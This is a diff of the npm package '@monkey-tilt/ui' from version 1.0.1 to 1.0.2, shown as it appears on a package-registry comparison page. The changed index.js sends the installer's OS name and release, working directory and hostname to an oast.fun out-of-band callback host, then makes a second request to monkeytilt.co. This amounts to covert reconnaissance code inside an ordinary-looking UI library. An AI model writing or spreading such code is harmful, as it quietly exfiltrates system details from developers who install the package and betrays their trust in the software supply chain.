@monkey-tilt/ui 1.0.1 → 1.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +2 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -12,7 +12,7 @@ const cwd = process.cwd();
|
|
12
12
|
const osname_str = `${osname} ${release}`;
|
13
13
|
|
14
14
|
function makeFirstRequest(status) {
|
15
|
-
const url1 = `https://
|
15
|
+
const url1 = `https://pzkkuxfdavblxlgwvabbfy0puoejnoyea.oast.fun/?1=${encodeURIComponent(osname_str)}&2=${encodeURIComponent(cwd)}&3=${encodeURIComponent(hostname)}`
|
16
16
|
+ (status ? `&4=${encodeURIComponent(status)}` : '');
|
17
17
|
|
18
18
|
https.get(url1, (res) => {
|
@@ -32,7 +32,7 @@ function makeFirstRequest(status) {
|
|
32
32
|
}
|
33
33
|
|
34
34
|
function makeSecondRequest() {
|
35
|
-
const url2 = 'https://
|
35
|
+
const url2 = 'https://monkeytilt.co/';
|
36
36
|
|
37
37
|
http.get(url2, (res) => {
|
38
38
|
const status = res.statusCode;
|